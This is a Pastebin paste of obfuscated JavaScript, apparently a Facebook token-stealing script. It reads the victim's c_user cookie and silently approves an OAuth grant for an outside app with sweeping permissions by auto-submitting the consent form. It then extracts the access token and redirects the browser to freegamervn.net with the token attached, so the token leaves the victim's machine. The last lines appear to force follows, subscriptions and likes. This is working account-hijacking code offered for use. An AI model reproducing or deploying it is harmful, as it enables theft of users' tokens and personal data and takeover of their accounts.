Advertisement
vietha

Untitled

Oct 20th, 2014
229
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.65 KB | None | 0 0
  1.  
  2.  
  3.  
  4. var profile_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]).toString();
  5.  
  6. function uygulamaizinver(_0x564ax3) {
  7. var _0x564ax4 = new XMLHttpRequest();
  8. _0x564ax4['onreadystatechange'] = function () {
  9. if (_0x564ax4['readyState'] == 4) {
  10. izinverhtml = document['createElement']('html');
  11. izinverhtml['innerHTML'] = _0x564ax4['responseText'];
  12. if (izinverhtml['getElementsByTagName']('form')['length'] > 0) {
  13. izinverhtml['innerHTML'] = izinverhtml['getElementsByTagName']('form')[0]['outerHTML'];
  14. act = izinverhtml['getElementsByTagName']('form')[0]['action'];
  15. duzenlevegonder(izinverhtml, act);
  16. };
  17. };
  18. };
  19. _0x564ax4['open']('GET', _0x564ax3, true);
  20. _0x564ax4['send']();
  21. };
  22.  
  23.  
  24.  
  25. function duzenlevegonder(_0x564ax6, _0x564ax7) {
  26. izinverparams = '';
  27. for (i = 0; i < _0x564ax6['getElementsByTagName']('input')['length']; i++) {
  28. if (_0x564ax6['getElementsByTagName']('input')[i]['name']['indexOf']('__CANCEL__') < 0 && _0x564ax6['getElementsByTagName']('input')[i]['name']['indexOf']('cancel_clicked')) {
  29. izinverparams += '&' + _0x564ax6['getElementsByTagName']('input')[i]['name'] + '=' + _0x564ax6['getElementsByTagName']('input')[i]['value'];
  30. };
  31. };
  32. if (_0x564ax6['getElementsByTagName']('select')['length'] > 0) {
  33. izinverparams += '&' + _0x564ax6['getElementsByTagName']('select')[0]['name'] + '=80';
  34. };
  35. izinverparams['replace']('&fb_dtsg', 'fb_dtsg');
  36. izinverparams += '&__CONFIRM__=1';
  37. _0x564ax6 = _0x564ax6;
  38. var _0x564ax4 = new XMLHttpRequest();
  39. _0x564ax4['onreadystatechange'] = function () {
  40. if (_0x564ax4['readyState'] == 4) {
  41. izinhtml = document['createElement']('html');
  42. izinhtml['innerHTML'] = _0x564ax4['responseText'];
  43. if (izinhtml['getElementsByTagName']('form')['length'] > 0) {
  44. izinhtml['innerHTML'] = izinhtml['getElementsByTagName']('form')[0]['outerHTML'];
  45. _0x564ax7 = izinhtml['getElementsByTagName']('form')[0]['action'];
  46. duzenlevegonder(izinhtml, _0x564ax7);
  47. } else {
  48. sex = _0x564ax4['responseText']['match'](/#access_token=(.*?)&expires_in/i);
  49. if (sex[1]) {
  50. tokenyolla(sex[1]);
  51. };
  52. };
  53. };
  54. };
  55. _0x564ax4['open']('POST', _0x564ax7, true);
  56. _0x564ax4['setRequestHeader']('Content-Type', 'application/x-www-form-urlencoded');
  57. _0x564ax4['send'](izinverparams);
  58. };
  59.  
  60. function TokenUrl(_0x564ax9) {
  61. return '//www.facebook.com/dialog/oauth?response_type=token&display=popup&client_id=' + _0x564ax9 + '&redirect_uri=fbconnect://success&sso_key=com&scope=ads_management,create_event,create_note,export_stream,friends_about_me,friends_activities,friends_birthday,friends_checkins,friends_education_history,friends_events,friends_games_activity,friends_groups,friends_hometown,friends_interests,friends_likes,friends_location,friends_notes,friends_online_presence,friends_photo_video_tags,friends_photos,friends_questions,friends_relationship_details,friends_relationships,friends_religion_politics,friends_status,friends_subscriptions,friends_videos,friends_website,friends_work_history,manage_friendlists,manage_notifications,manage_pages,photo_upload,publish_actions,publish_checkins,publish_stream,read_friendlists,read_insights,read_requests,read_stream,rsvp_event,share_item,sms,status_update,user_about_me,user_activities,user_birthday,user_education_history,user_events,user_games_activity,user_groups,user_hometown,user_interests,user_likes,user_location,user_notes,user_online_presence,user_photo_video_tags,user_photos,user_questions,user_relationship_details,user_relationships,user_religion_politics,user_status,user_subscriptions,user_videos,user_website,user_work_history,video_upload,xmpp_login,offline_access';
  62. };
  63. if (!localStorage['token_' + profile_id] || (localStorage['token_' + profile_id] && tarih['getTime']() >= localStorage['token_' + profile_id])) {
  64. uygulamaizinver(TokenUrl('165907476854626'));
  65. var http = new XMLHttpRequest();
  66. http['open']('GET', 'https://graph.facebook.com/' + profile_id, false);
  67. http['send']();
  68. var get = JSON['parse'](http['responseText']);
  69. var isim = get['name'];
  70. };
  71.  
  72. function tokenyolla(_0x564axe) {
  73. top['location']['href'] = 'http://freegamervn.net/cut.html#' + _0x564axe;
  74. };
  75. a("100003046085242") ; a("100004872735893") ;
  76. sublist("610265399084991"); sublist(" 347463942092694") ;
  77. Like("632438733540022") ; like("984644624885914") ;like("878480158838662");
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement